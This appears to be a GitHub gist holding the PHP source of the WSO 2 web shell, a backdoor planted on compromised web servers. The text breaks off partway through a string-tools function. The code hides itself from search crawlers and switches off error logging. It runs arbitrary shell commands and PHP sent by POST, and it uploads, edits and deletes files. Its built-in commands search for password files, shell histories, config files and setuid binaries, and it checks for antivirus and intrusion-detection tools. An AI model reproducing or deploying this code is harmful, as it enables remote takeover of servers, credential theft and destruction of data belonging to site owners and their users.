Created
June 4, 2013 15:22
-
-
Save luxifer/5706765 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * WSO 2 | |
| * Web Shell by atom | |
| */ | |
| $auth = array( | |
| 'md5pass' => "3460d81e02faa3559f9e02c9a766fcbd" // fuck u | |
| ); | |
| $color = "#df5"; | |
| @define('SELF_PATH', __FILE__); | |
| if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { | |
| header('HTTP/1.0 404 Not Found'); | |
| exit; | |
| } | |
| @session_start(); | |
| @error_reporting(0); | |
| @ini_set('error_log',NULL); | |
| @ini_set('log_errors',0); | |
| @ini_set('max_execution_time',0); | |
| @set_time_limit(0); | |
| @set_magic_quotes_runtime(0); | |
| @define('VERSION', '2'); | |
| if( get_magic_quotes_gpc() ) { | |
| function stripslashes_array($array) { | |
| return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); | |
| } | |
| $_POST = stripslashes_array($_POST); | |
| } | |
| function printLogin() { | |
| ?> | |
| <center> | |
| <form method=post> | |
| Password: <input type=password name=pass><input type=submit value='>>'> | |
| </form></center> | |
| <?php | |
| exit; | |
| } | |
| if( !isset( $_SESSION['sh_logined'] )) | |
| if( empty( $auth['md5pass'] ) || | |
| ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth['md5pass'] ) ) ) | |
| $_SESSION['sh_logined'] = true; | |
| else | |
| printLogin(); | |
| if( strtolower( substr(PHP_OS,0,3) ) == "win" ) | |
| $os = 'win'; | |
| else | |
| $os = 'nix'; | |
| $safe_mode = @ini_get('safe_mode'); | |
| $disable_functions = @ini_get('disable_functions'); | |
| $home_cwd = @getcwd(); | |
| if( isset( $_POST['c'] ) ) | |
| @chdir($_POST['c']); | |
| $cwd = @getcwd(); | |
| if( $os == 'win') { | |
| $home_cwd = str_replace("\\", "/", $home_cwd); | |
| $cwd = str_replace("\\", "/", $cwd); | |
| } | |
| if( $cwd[strlen($cwd)-1] != '/' ) | |
| $cwd .= '/'; | |
| if($os == 'win') | |
| $aliases = array( | |
| "List Directory" => "dir", | |
| "Find index.php in current dir" => "dir /s /w /b index.php", | |
| "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | |
| "Show active connections" => "netstat -an", | |
| "Show running services" => "net start", | |
| "User accounts" => "net user", | |
| "Show computers" => "net view", | |
| "ARP Table" => "arp -a", | |
| "IP Configuration" => "ipconfig /all" | |
| ); | |
| else | |
| $aliases = array( | |
| "List dir" => "ls -la", | |
| "list file attributes on a Linux second extended file system" => "lsattr -va", | |
| "show opened ports" => "netstat -an | grep -i listen", | |
| "Find" => "", | |
| "find all suid files" => "find / -type f -perm -04000 -ls", | |
| "find suid files in current dir" => "find . -type f -perm -04000 -ls", | |
| "find all sgid files" => "find / -type f -perm -02000 -ls", | |
| "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | |
| "find config.inc.php files" => "find / -type f -name config.inc.php", | |
| "find config* files" => "find / -type f -name \"config*\"", | |
| "find config* files in current dir" => "find . -type f -name \"config*\"", | |
| "find all writable folders and files" => "find / -perm -2 -ls", | |
| "find all writable folders and files in current dir" => "find . -perm -2 -ls", | |
| "find all service.pwd files" => "find / -type f -name service.pwd", | |
| "find service.pwd files in current dir" => "find . -type f -name service.pwd", | |
| "find all .htpasswd files" => "find / -type f -name .htpasswd", | |
| "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | |
| "find all .bash_history files" => "find / -type f -name .bash_history", | |
| "find .bash_history files in current dir" => "find . -type f -name .bash_history", | |
| "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | |
| "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | |
| "Locate" => "", | |
| "locate httpd.conf files" => "locate httpd.conf", | |
| "locate vhosts.conf files" => "locate vhosts.conf", | |
| "locate proftpd.conf files" => "locate proftpd.conf", | |
| "locate psybnc.conf files" => "locate psybnc.conf", | |
| "locate my.conf files" => "locate my.conf", | |
| "locate admin.php files" =>"locate admin.php", | |
| "locate cfg.php files" => "locate cfg.php", | |
| "locate conf.php files" => "locate conf.php", | |
| "locate config.dat files" => "locate config.dat", | |
| "locate config.php files" => "locate config.php", | |
| "locate config.inc files" => "locate config.inc", | |
| "locate config.inc.php" => "locate config.inc.php", | |
| "locate config.default.php files" => "locate config.default.php", | |
| "locate config* files " => "locate config", | |
| "locate .conf files"=>"locate '.conf'", | |
| "locate .pwd files" => "locate '.pwd'", | |
| "locate .sql files" => "locate '.sql'", | |
| "locate .htpasswd files" => "locate '.htpasswd'", | |
| "locate .bash_history files" => "locate '.bash_history'", | |
| "locate .mysql_history files" => "locate '.mysql_history'", | |
| "locate .fetchmailrc files" => "locate '.fetchmailrc'", | |
| "locate backup files" => "locate backup", | |
| "locate dump files" => "locate dump", | |
| "locate priv files" => "locate priv" | |
| ); | |
| function printHeader() { | |
| if(empty($_POST['charset'])) | |
| $_POST['charset'] = "UTF-8"; | |
| global $color; | |
| ?> | |
| <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title> | |
| <style> | |
| body { background-color:#444;font: 9pt Lucida,Verdana;color:#e1e1e1;margin: 0; } | |
| td,th { font: 9pt Lucida,Verdana;vertical-align:top; } | |
| table.info { color:#fff;background-color:#222; } | |
| span { color:<?=$color?>;font-weight: bolder; } | |
| h1 { color:<?=$color?>;border-left:5px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } | |
| div.content { padding: 5px;margin-left:5px;background-color:#333; } | |
| a { text-decoration:none; color:<?=$color?>; } | |
| a:hover { text-decoration:underline; } | |
| .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; } | |
| .bigarea { width:100%;height:250px; } | |
| input, textarea, select { margin:0;color:#fff;background-color:#555;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } | |
| form { margin:0px; } | |
| #toolsTbl { text-align:center; } | |
| .toolsInp { width: 300px } | |
| .main th{text-align:left;background-color:#5e5e5e;} | |
| .main tr:hover{background-color:#5e5e5e} | |
| .main td, th{vertical-align:middle} | |
| .l1 {background-color:#444} | |
| pre{font-family:Courier,Monospace;} | |
| </style> | |
| <script> | |
| function set(a,c,p1,p2,p3,charset) { | |
| if(a != null)document.mf.a.value=a; | |
| if(c != null)document.mf.c.value=c; | |
| if(p1 != null)document.mf.p1.value=p1; | |
| if(p2 != null)document.mf.p2.value=p2; | |
| if(p3 != null)document.mf.p3.value=p3; | |
| if(charset != null)document.mf.charset.value=charset; | |
| } | |
| function g(a,c,p1,p2,p3,charset) { | |
| set(a,c,p1,p2,p3,charset); | |
| document.mf.submit(); | |
| } | |
| function a(a,c,p1,p2,p3,charset) { | |
| set(a,c,p1,p2,p3,charset); | |
| var params = "ajax=true"; | |
| for(i=0;i<document.mf.elements.length;i++) | |
| params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); | |
| sr('<?=$_SERVER['REQUEST_URI'];?>', params); | |
| } | |
| function sr(url, params) { | |
| if (window.XMLHttpRequest) { | |
| req = new XMLHttpRequest(); | |
| req.onreadystatechange = processReqChange; | |
| req.open("POST", url, true); | |
| req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); | |
| req.send(params); | |
| } | |
| else if (window.ActiveXObject) { | |
| req = new ActiveXObject("Microsoft.XMLHTTP"); | |
| if (req) { | |
| req.onreadystatechange = processReqChange; | |
| req.open("POST", url, true); | |
| req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); | |
| req.send(params); | |
| } | |
| } | |
| } | |
| function processReqChange() { | |
| if( (req.readyState == 4) ) | |
| if(req.status == 200) { | |
| //alert(req.responseText); | |
| var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); | |
| var arr=reg.exec(req.responseText); | |
| eval(arr[2].substr(0, arr[1])); | |
| } | |
| else alert("Request error!"); | |
| } | |
| </script> | |
| <head><body> | |
| <form method=post name=mf style='display:none;'> | |
| <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> | |
| <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> | |
| <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> | |
| <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> | |
| <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> | |
| <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> | |
| </form> | |
| <?php | |
| $freeSpace = @diskfreespace($GLOBALS['cwd']); | |
| $totalSpace = @disk_total_space($GLOBALS['cwd']); | |
| $totalSpace = $totalSpace?$totalSpace:1; | |
| $release = @php_uname('r'); | |
| $kernel = @php_uname('s'); | |
| $millink='http://milw0rm.com/search.php?dong='; | |
| if( strpos('Linux', $kernel) !== false ) | |
| $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); | |
| else | |
| $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); | |
| if(!function_exists('posix_getegid')) { | |
| $user = @get_current_user(); | |
| $uid = @getmyuid(); | |
| $gid = @getmygid(); | |
| $group = "?"; | |
| } else { | |
| $uid = @posix_getpwuid(@posix_geteuid()); | |
| $gid = @posix_getgrgid(@posix_getegid()); | |
| $user = $uid['name']; | |
| $uid = $uid['uid']; | |
| $group = $gid['name']; | |
| $gid = $gid['gid']; | |
| } | |
| $cwd_links = ''; | |
| $path = explode("/", $GLOBALS['cwd']); | |
| $n=count($path); | |
| for($i=0;$i<$n-1;$i++) { | |
| $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; | |
| for($j=0;$j<=$i;$j++) | |
| $cwd_links .= $path[$j].'/'; | |
| $cwd_links .= "\")'>".$path[$i]."/</a>"; | |
| } | |
| $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); | |
| $opt_charsets = ''; | |
| foreach($charsets as $item) | |
| $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; | |
| $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network', 'Logout'=>'Logout', 'Self remove' => 'SelfRemove'); | |
| $menu = ''; | |
| foreach($m as $k => $v) | |
| $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; | |
| $drives = ""; | |
| if ($GLOBALS['os'] == 'win') { | |
| foreach( range('a','z') as $drive ) | |
| if (is_dir($drive.':\\')) | |
| $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; | |
| } | |
| echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'. | |
| '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'. | |
| '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. | |
| '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; | |
| } | |
| function printFooter() { | |
| $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; | |
| ?> | |
| </div> | |
| <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style="border-top:2px solid #333;border-bottom:2px solid #333;"> | |
| <tr> | |
| <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> | |
| <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> | |
| </tr> | |
| <tr> | |
| <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> | |
| <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> | |
| </tr> | |
| <tr> | |
| <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> | |
| <td><form method='post' ENCTYPE='multipart/form-data'> | |
| <input type=hidden name=a value='FilesMAn'> | |
| <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> | |
| <input type=hidden name=p1 value='uploadFile'> | |
| <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> | |
| <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> | |
| </tr> | |
| </table> | |
| </body></html> | |
| <?php | |
| } | |
| if ( !function_exists("posix_getpwuid") ) { function posix_getpwuid($p) { return false; } } | |
| if ( !function_exists("posix_getgrgid") ) { function posix_getgrgid($p) { return false; } } | |
| function ex($in) { | |
| $out = ''; | |
| if(function_exists('exec')) { | |
| @exec($in,$out); | |
| $out = @join("\n",$out); | |
| }elseif(function_exists('passthru')) { | |
| ob_start(); | |
| @passthru($in); | |
| $out = ob_get_clean(); | |
| }elseif(function_exists('system')) { | |
| ob_start(); | |
| @system($in); | |
| $out = ob_get_clean(); | |
| }elseif(function_exists('shell_exec')) { | |
| $out = shell_exec($in); | |
| }elseif(is_resource($f = @popen($in,"r"))) { | |
| $out = ""; | |
| while(!@feof($f)) | |
| $out .= fread($f,1024); | |
| pclose($f); | |
| } | |
| return $out; | |
| } | |
| function viewSize($s) { | |
| if($s >= 1073741824) | |
| return sprintf('%1.2f', $s / 1073741824 ). ' GB'; | |
| elseif($s >= 1048576) | |
| return sprintf('%1.2f', $s / 1048576 ) . ' MB'; | |
| elseif($s >= 1024) | |
| return sprintf('%1.2f', $s / 1024 ) . ' KB'; | |
| else | |
| return $s . ' B'; | |
| } | |
| function perms($p) { | |
| if (($p & 0xC000) == 0xC000)$i = 's'; | |
| elseif (($p & 0xA000) == 0xA000)$i = 'l'; | |
| elseif (($p & 0x8000) == 0x8000)$i = '-'; | |
| elseif (($p & 0x6000) == 0x6000)$i = 'b'; | |
| elseif (($p & 0x4000) == 0x4000)$i = 'd'; | |
| elseif (($p & 0x2000) == 0x2000)$i = 'c'; | |
| elseif (($p & 0x1000) == 0x1000)$i = 'p'; | |
| else $i = 'u'; | |
| $i .= (($p & 0x0100) ? 'r' : '-'); | |
| $i .= (($p & 0x0080) ? 'w' : '-'); | |
| $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); | |
| $i .= (($p & 0x0020) ? 'r' : '-'); | |
| $i .= (($p & 0x0010) ? 'w' : '-'); | |
| $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); | |
| $i .= (($p & 0x0004) ? 'r' : '-'); | |
| $i .= (($p & 0x0002) ? 'w' : '-'); | |
| $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); | |
| return $i; | |
| } | |
| function viewPermsColor($f) { | |
| if (!is_readable($f)) | |
| return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; | |
| elseif (!is_writable($f)) | |
| return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; | |
| else | |
| return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; | |
| } | |
| if(!function_exists("scandir")) { | |
| function scandir($dir) { | |
| $dh = opendir($dir); | |
| while (false !== ($filename = readdir($dh))) { | |
| $files[] = $filename; | |
| } | |
| return $files; | |
| } | |
| } | |
| function which($p) { | |
| $path = ex('which '.$p); | |
| if(!empty($path)) | |
| return $path; | |
| return false; | |
| } | |
| function actionSecInfo() { | |
| echo '<h1>Server security information</h1><div class=content>'; | |
| function showSecParam($n, $v) { | |
| $v = trim($v); | |
| if($v) { | |
| echo '<span>'.$n.': </span>'; | |
| if(strpos($v, "\n") === false) | |
| echo $v.'<br>'; | |
| else | |
| echo '<pre class=ml1>'.$v.'</pre>'; | |
| } | |
| } | |
| showSecParam('Server software', @getenv('SERVER_SOFTWARE')); | |
| showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); | |
| showSecParam('Open base dir', @ini_get('open_basedir')); | |
| showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); | |
| showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); | |
| showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); | |
| $temp=''; | |
| if(function_exists('mysql_get_client_info')) | |
| $temp = mysql_get_client_info(); | |
| showSecParam('MySql support', $temp?$temp:'no'); | |
| showSecParam('MSSql support', function_exists('mssql_connect')?'yes':'no'); | |
| showSecParam('Oracle support', function_exists('oci_connect')?'yes':'no'); | |
| showSecParam('PostgreSQL support', function_exists('oci_connect')?'yes':'no'); | |
| echo '<br>'; | |
| if( $GLOBALS['os'] == 'nix' ) { | |
| $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); | |
| $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); | |
| $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); | |
| showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); | |
| showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); | |
| showSecParam('OS version', @file_get_contents('/proc/version')); | |
| showSecParam('Distr name', @file_get_contents('/etc/issue.net')); | |
| if(!$GLOBALS['safe_mode']) { | |
| echo '<br>'; | |
| $temp=''; | |
| foreach ($userful as $item) | |
| if(which($item)){$temp.=' '.$item;} | |
| showSecParam('Userful', $temp); | |
| $temp=''; | |
| foreach ($danger as $item) | |
| if(which($item)){$temp.=' '.$item;} | |
| showSecParam('Danger', $temp); | |
| $temp=''; | |
| foreach ($downloaders as $item) | |
| if(which($item)){$temp.=' '.$item;} | |
| showSecParam('Downloaders', $temp); | |
| echo '<br/>'; | |
| showSecParam('Hosts', @file_get_contents('/etc/hosts')); | |
| showSecParam('RAM', ex('free -m')); | |
| showSecParam('HDD space', ex('df -h')); | |
| showSecParam('Mount options', @file_get_contents('/etc/fstab')); | |
| } | |
| } else { | |
| showSecParam('OS Version',ex('ver')); | |
| showSecParam('Account Settings',ex('net accounts')); | |
| showSecParam('User Accounts',ex('net user')); | |
| } | |
| echo '</div>'; | |
| } | |
| function actionPhp() { | |
| if( isset($_POST['ajax']) ) { | |
| ob_start(); | |
| eval($_POST['p1']); | |
| $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | |
| echo strlen($temp), "\n", $temp; | |
| exit; | |
| } | |
| if( isset($_POST['p1']) && ($_POST['p1'] == 'info') ) { | |
| echo '<h1>PHP info</h1><div class=content>'; | |
| ob_start(); | |
| phpinfo(); | |
| $tmp = ob_get_clean(); | |
| $tmp = preg_replace('!body {.*}!msiU','',$tmp); | |
| $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); | |
| $tmp = preg_replace('!h1!msiU','h2',$tmp); | |
| $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); | |
| $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); | |
| echo $tmp; | |
| echo '</div><br>'; | |
| } | |
| echo '<h1>Execution PHP-code</h1><div class=content><textarea class=bigarea id=PhpCode></textarea><input type=button value=Eval style="margin-top:5px" onclick="a(null,null,document.getElementById(\'PhpCode\').value);"><pre id=PhpOutput style="display:none;margin-top:5px;" class=ml1></pre></div>'; | |
| } | |
| function actionFilesMan() { | |
| echo '<h1>File manager</h1><div class=content>'; | |
| if(isset($_POST['p1'])) { | |
| switch($_POST['p1']) { | |
| case 'uploadFile': | |
| if(!move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) | |
| echo "Can't upload file!"; | |
| break; | |
| break; | |
| case 'mkdir': | |
| if(!@mkdir($_POST['p2'])) | |
| echo "Can't create new dir"; | |
| break; | |
| case 'delete': | |
| function deleteDir($path) { | |
| $path = (substr($path,-1)=='/') ? $path:$path.'/'; | |
| $dh = opendir($path); | |
| while ( ($item = readdir($dh) ) !== false) { | |
| $item = $path.$item; | |
| if ( (basename($item) == "..") || (basename($item) == ".") ) | |
| continue; | |
| $type = filetype($item); | |
| if ($type == "dir") | |
| deleteDir($item); | |
| else | |
| @unlink($item); | |
| } | |
| closedir($dh); | |
| rmdir($path); | |
| } | |
| if(is_array(@$_POST['f'])) | |
| foreach($_POST['f'] as $f) { | |
| $f = urldecode($f); | |
| if(is_dir($f)) | |
| deleteDir($f); | |
| else | |
| @unlink($f); | |
| } | |
| break; | |
| case 'paste': | |
| if($_SESSION['act'] == 'copy') { | |
| function copy_paste($c,$s,$d){ | |
| if(is_dir($c.$s)){ | |
| mkdir($d.$s); | |
| $h = opendir($c.$s); | |
| while (($f = readdir($h)) !== false) | |
| if (($f != ".") and ($f != "..")) { | |
| copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
| } | |
| } elseif(is_file($c.$s)) { | |
| @copy($c.$s, $d.$s); | |
| } | |
| } | |
| foreach($_SESSION['f'] as $f) | |
| copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']); | |
| } elseif($_SESSION['act'] == 'move') { | |
| function move_paste($c,$s,$d){ | |
| if(is_dir($c.$s)){ | |
| mkdir($d.$s); | |
| $h = opendir($c.$s); | |
| while (($f = readdir($h)) !== false) | |
| if (($f != ".") and ($f != "..")) { | |
| copy_paste($c.$s.'/',$f, $d.$s.'/'); | |
| } | |
| } elseif(is_file($c.$s)) { | |
| @copy($c.$s, $d.$s); | |
| } | |
| } | |
| foreach($_SESSION['f'] as $f) | |
| @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); | |
| } | |
| unset($_SESSION['f']); | |
| break; | |
| default: | |
| if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { | |
| $_SESSION['act'] = @$_POST['p1']; | |
| $_SESSION['f'] = @$_POST['f']; | |
| foreach($_SESSION['f'] as $k => $f) | |
| $_SESSION['f'][$k] = urldecode($f); | |
| $_SESSION['cwd'] = @$_POST['c']; | |
| } | |
| break; | |
| } | |
| echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; | |
| } | |
| $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | |
| if($dirContent === false) { echo 'Can\'t open this folder!'; return; } | |
| global $sort; | |
| $sort = array('name', 1); | |
| if(!empty($_POST['p1'])) { | |
| if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | |
| $sort = array($match[1], (int)$match[2]); | |
| } | |
| ?> | |
| <script> | |
| function sa() { | |
| for(i=0;i<document.files.elements.length;i++) | |
| if(document.files.elements[i].type == 'checkbox') | |
| document.files.elements[i].checked = document.files.elements[0].checked; | |
| } | |
| </script> | |
| <table width='100%' class='main' cellspacing='0' cellpadding='2'> | |
| <form name=files method=post> | |
| <?php | |
| echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(null,null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(null,null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(null,null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(null,null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | |
| $dirs = $files = $links = array(); | |
| $n = count($dirContent); | |
| for($i=0;$i<$n;$i++) { | |
| $ow = posix_getpwuid(@fileowner($dirContent[$i])); | |
| $gr = posix_getgrgid(@filegroup($dirContent[$i])); | |
| $tmp = array('name' => $dirContent[$i], | |
| 'path' => $GLOBALS['cwd'].$dirContent[$i], | |
| 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), | |
| 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), | |
| 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | |
| 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | |
| 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | |
| ); | |
| if(is_file($GLOBALS['cwd'].$dirContent[$i])) | |
| $files[] = array_merge($tmp, array('type' => 'file')); | |
| elseif(is_link($GLOBALS['cwd'].$dirContent[$i])) | |
| $links[] = array_merge($tmp, array('type' => 'link')); | |
| elseif(is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) | |
| $dirs[] = array_merge($tmp, array('type' => 'dir')); | |
| } | |
| $GLOBALS['sort'] = $sort; | |
| function cmp($a, $b) { | |
| if($GLOBALS['sort'][0] != 'size') | |
| return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); | |
| else | |
| return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | |
| } | |
| usort($files, "cmp"); | |
| usort($dirs, "cmp"); | |
| usort($links, "cmp"); | |
| $files = array_merge($dirs, $links, $files); | |
| $l = 0; | |
| foreach($files as $f) { | |
| echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | |
| .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | |
| $l = $l?0:1; | |
| } | |
| ?> | |
| <tr><td colspan=7> | |
| <input type=hidden name=a value='FilesMan'> | |
| <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> | |
| <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> | |
| <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr> | |
| </form></table></div> | |
| <?php | |
| } | |
| function actionStringTools() { | |
| if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} | |
| if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} | |
